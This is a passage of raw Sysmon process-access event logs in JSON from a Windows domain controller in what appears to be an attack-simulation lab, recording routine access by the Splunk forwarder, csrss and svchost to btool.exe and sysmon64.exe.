{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00105AD50300}","TargetProcessId":"3908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00105AD50300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00105AD50300}","TargetProcessId":"3908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 